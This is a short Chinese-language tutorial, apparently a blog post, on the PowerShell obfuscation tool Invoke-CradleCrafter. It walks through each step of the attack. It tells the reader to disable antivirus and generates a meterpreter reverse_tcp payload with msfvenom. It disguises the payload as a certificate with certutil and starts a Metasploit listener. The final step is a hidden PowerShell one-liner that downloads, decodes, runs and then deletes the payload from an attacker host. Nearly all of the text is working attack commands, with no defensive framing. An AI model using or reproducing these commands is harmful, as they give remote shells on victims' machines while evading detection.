介绍
Invoke-CradleCrafter是一个基于windows PowerShell远程下载的生成器和混淆器
下载安装
下载
https://github.com/danielbohannon/Invoke-CradleCrafter
安装
设置运行其他脚本的权限,然后安装Invoke-CradleCrafter,要把杀毒软件关了,否则会报错
Set-ExecutionPolicy Bypass
Import-Module ./Invoke-CradleCrafter.psd1
使用
第一步
使用msfvenom生成payload,
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.125.130 lport=8888 -e cmd/powershell_base64 -f psh -o payload.txt
然后在payload.txt目录下启动一个web服务,服务器ip为192.168.125.130,即链接为http://192.168.125.130/payload.txt
第二步
使用如下命令启动Invoke-CradleCrafter:
Invoke-CradleCrafter
先后执行如下命令,生成混淆payload
set URL http://192.168.125.130/payload.txt
MEMORY
CERTUTIL
ALL
1
将Result:中的内容保存为cert.txt,如用如下命令进行生成伪证书
certutil -encode cert.txt cert.cer
将cert.cer也放在web目录下
第三步
使用msfconsole开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.125.130
set lport 8888
exploit -j -z
第四步
利用
powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%/cert.cer (New-Object Net.WebClient).DownloadString('http://192.168.125.130/cert.cer'); certutil -decode %APPDATA%/cert.cer %APPDATA%/stage.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%/stage.ps1 & start /b cmd /c del %APPDATA%/cert.cer